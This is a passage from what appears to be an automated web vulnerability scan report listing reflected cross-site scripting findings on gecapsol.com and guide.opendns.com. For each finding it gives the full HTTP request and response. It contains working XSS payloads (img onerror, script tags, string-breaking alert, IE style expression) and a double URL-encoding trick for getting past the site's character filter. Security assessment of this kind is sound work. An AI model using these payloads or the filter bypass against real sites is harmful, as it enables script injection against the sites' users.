Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/terms.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 690a7%2522%2520a%253db%2520e336d0e875e was submitted in the REST URL parameter 6. This input was echoed as 690a7" a=b e336d0e875e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06690a7%2522%2520a%253db%2520e336d0e875e/about_us/terms.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:48:53 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d06690a7" a=b e336d0e875e; Expires=Fri, 25-Nov-2011 03:48:44 GMT; Path=/cms/
Set-Cookie: JSESSIONID=76809ED71402BEDB33062E362E27FF9F; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:48:53 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 41971
Connection: close


<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equiv="conte
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06690a7" a=b e336d0e875e/about_us/terms.html">
...[SNIP]...

2.118. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/government.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/government.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4c69"><img%20src%3da%20onerror%3dalert(1)>88fc4424d2b was submitted in the REST URL parameter 6. This input was echoed as a4c69"><img src=a onerror=alert(1)>88fc4424d2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06a4c69"><img%20src%3da%20onerror%3dalert(1)>88fc4424d2b/financial_products/all_products/government.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:38 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d06a4c69"><img src=a onerror=alert(1)>88fc4424d2b; Expires=Fri, 25-Nov-2011 03:49:38 GMT; Path=/cms/
Set-Cookie: JSESSIONID=33112F8ADC6B528B66930E2A6C08F007; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:38 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17328
Connection: close


<!-- try /financial_products/all_products -->
<!-- try /financial_products -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DT
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06a4c69"><img src=a onerror=alert(1)>88fc4424d2b/financial_products/all_products/government.html">
...[SNIP]...

2.119. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/government.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/government.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ed20"-alert(1)-"7d0d9fcc5f3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d068ed20"-alert(1)-"7d0d9fcc5f3/financial_products/all_products/government.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:40 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d068ed20"-alert(1)-"7d0d9fcc5f3; Expires=Fri, 25-Nov-2011 03:49:39 GMT; Path=/cms/
Set-Cookie: JSESSIONID=0DF8D8E614EAD6DB50E766EB9C862CB0; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:40 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 16356
Connection: close


<!-- try /financial_products/all_products -->
<!-- try /financial_products -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DT
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d068ed20"-alert(1)-"7d0d9fcc5f3/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.120. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/purchase_order.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/purchase_order.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb628"><img%20src%3da%20onerror%3dalert(1)>34aec74f79c was submitted in the REST URL parameter 6. This input was echoed as bb628"><img src=a onerror=alert(1)>34aec74f79c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06bb628"><img%20src%3da%20onerror%3dalert(1)>34aec74f79c/financial_products/all_products/purchase_order.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:42 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d06bb628"><img src=a onerror=alert(1)>34aec74f79c; Expires=Fri, 25-Nov-2011 03:49:42 GMT; Path=/cms/
Set-Cookie: JSESSIONID=57DE0EE19D831B4063BA537D7822D326; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:42 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 16561
Connection: close


<!-- try /financial_products/all_products -->
<!-- try /financial_products -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DT
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06bb628"><img src=a onerror=alert(1)>34aec74f79c/financial_products/all_products/purchase_order.html">
...[SNIP]...

2.121. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/purchase_order.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/purchase_order.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cef40"-alert(1)-"41e95f2703f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06cef40"-alert(1)-"41e95f2703f/financial_products/all_products/purchase_order.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:52 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d06cef40"-alert(1)-"41e95f2703f; Expires=Fri, 25-Nov-2011 03:49:48 GMT; Path=/cms/
Set-Cookie: JSESSIONID=C8919E26A73470F7695D857E4D791CFE; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:52 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 15607
Connection: close


<!-- try /financial_products/all_products -->
<!-- try /financial_products -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DT
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06cef40"-alert(1)-"41e95f2703f/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.122. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/real_estate.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/real_estate.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d4b6"-alert(1)-"d67c1395113 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/1d4b6"-alert(1)-"d67c1395113/financial_products/all_products/real_estate.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:43 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=1d4b6"-alert(1)-"d67c1395113; Expires=Fri, 25-Nov-2011 03:49:42 GMT; Path=/cms/
Set-Cookie: JSESSIONID=4259A7F60B5413617802FD3BECBC5A6E; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:43 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17317
Connection: close


<!-- try /financial_products/all_products -->
<!-- try /financial_products -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DT
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/1d4b6"-alert(1)-"d67c1395113/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.123. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/real_estate.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/real_estate.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fa2d"><img%20src%3da%20onerror%3dalert(1)>16cfe0bd4c2 was submitted in the REST URL parameter 6. This input was echoed as 4fa2d"><img src=a onerror=alert(1)>16cfe0bd4c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/4fa2d"><img%20src%3da%20onerror%3dalert(1)>16cfe0bd4c2/financial_products/all_products/real_estate.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:38 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=4fa2d"><img src=a onerror=alert(1)>16cfe0bd4c2; Expires=Fri, 25-Nov-2011 03:49:30 GMT; Path=/cms/
Set-Cookie: JSESSIONID=9BC62AFADB298C89B04F442C2D91372C; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:38 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 18361
Connection: close


<!-- try /financial_products/all_products -->
<!-- try /financial_products -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DT
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/4fa2d"><img src=a onerror=alert(1)>16cfe0bd4c2/financial_products/all_products/real_estate.html">
...[SNIP]...

2.124. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/third_party.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/third_party.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8baeb"-alert(1)-"58f07899312 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d068baeb"-alert(1)-"58f07899312/financial_products/all_products/third_party.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:54 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d068baeb"-alert(1)-"58f07899312; Expires=Fri, 25-Nov-2011 03:49:53 GMT; Path=/cms/
Set-Cookie: JSESSIONID=C5D4F7F09DFB76F344B47DC9E8AFC550; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:54 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 16092
Connection: close


<!-- try /financial_products/all_products -->
<!-- try /financial_products -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DT
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d068baeb"-alert(1)-"58f07899312/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.125. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/third_party.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/third_party.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1388c"><img%20src%3da%20onerror%3dalert(1)>8bca7ad4d94 was submitted in the REST URL parameter 6. This input was echoed as 1388c"><img src=a onerror=alert(1)>8bca7ad4d94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d061388c"><img%20src%3da%20onerror%3dalert(1)>8bca7ad4d94/financial_products/all_products/third_party.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:52 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d061388c"><img src=a onerror=alert(1)>8bca7ad4d94; Expires=Fri, 25-Nov-2011 03:49:52 GMT; Path=/cms/
Set-Cookie: JSESSIONID=BEE88364929C3FB25B656743BCF13A1F; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:52 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17064
Connection: close


<!-- try /financial_products/all_products -->
<!-- try /financial_products -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DT
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d061388c"><img src=a onerror=alert(1)>8bca7ad4d94/financial_products/all_products/third_party.html">
...[SNIP]...

2.126. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/trans.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/trans.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b471"-alert(1)-"e24984e6f51 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d069b471"-alert(1)-"e24984e6f51/financial_products/all_products/trans.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:53 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d069b471"-alert(1)-"e24984e6f51; Expires=Fri, 25-Nov-2011 03:49:46 GMT; Path=/cms/
Set-Cookie: JSESSIONID=8FA0B3883BDE554C7B95F5C2A07FFCED; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:53 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17722
Connection: close


<!-- try /financial_products/all_products -->
<!-- try /financial_products -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DT
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d069b471"-alert(1)-"e24984e6f51/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.127. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/trans.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/trans.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aa5b"><img%20src%3da%20onerror%3dalert(1)>7cd4ff1a4dd was submitted in the REST URL parameter 6. This input was echoed as 7aa5b"><img src=a onerror=alert(1)>7cd4ff1a4dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d067aa5b"><img%20src%3da%20onerror%3dalert(1)>7cd4ff1a4dd/financial_products/all_products/trans.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:39 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d067aa5b"><img src=a onerror=alert(1)>7cd4ff1a4dd; Expires=Fri, 25-Nov-2011 03:49:39 GMT; Path=/cms/
Set-Cookie: JSESSIONID=23531A00719DD49809A5AB8C78959876; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:39 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 18730
Connection: close


<!-- try /financial_products/all_products -->
<!-- try /financial_products -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DT
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d067aa5b"><img src=a onerror=alert(1)>7cd4ff1a4dd/financial_products/all_products/trans.html">
...[SNIP]...

2.128. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/index.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/index.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 760b9%2522%252dalert%25281%2529%252d%2522df8bd7fde03 was submitted in the REST URL parameter 6. This input was echoed as 760b9"-alert(1)-"df8bd7fde03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06760b9%2522%252dalert%25281%2529%252d%2522df8bd7fde03/index.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:02 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d06760b9"-alert(1)-"df8bd7fde03; Expires=Fri, 25-Nov-2011 03:48:56 GMT; Path=/cms/
Set-Cookie: JSESSIONID=0BA61F1005C0999E89FD411F300B01B5; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:02 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 24299
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>GE Capital - equipm
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06760b9"-alert(1)-"df8bd7fde03/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.129. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/index.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/index.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490ed"%20style%3dx%3aexpression(alert(1))%20dad755127e8 was submitted in the REST URL parameter 6. This input was echoed as 490ed" style=x:expression(alert(1)) dad755127e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06490ed"%20style%3dx%3aexpression(alert(1))%20dad755127e8/index.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:48:48 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d06490ed" style=x:expression(alert(1)) dad755127e8; Expires=Fri, 25-Nov-2011 03:48:42 GMT; Path=/cms/
Set-Cookie: JSESSIONID=2AFB08D4D31C116BDE2791230F019026; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:48:48 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 25743
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>GE Capital - equipm
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06490ed" style=x:expression(alert(1)) dad755127e8/index.html">
...[SNIP]...

2.130. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guide.opendns.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aec9"><script>alert(1)</script>875e643c34a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4aec9\"><script>alert(1)</script>875e643c34a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?url=intheknowit%2Ecom%2Fmodules%2Fform%2Eswf%3Fform%3Dform1&4aec9"><script>alert(1)</script>875e643c34a=1 HTTP/1.1
Host: guide.opendns.com
Proxy-Connection: keep-alive
Referer: http://www.optimaitconsulting.com/client_resources.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
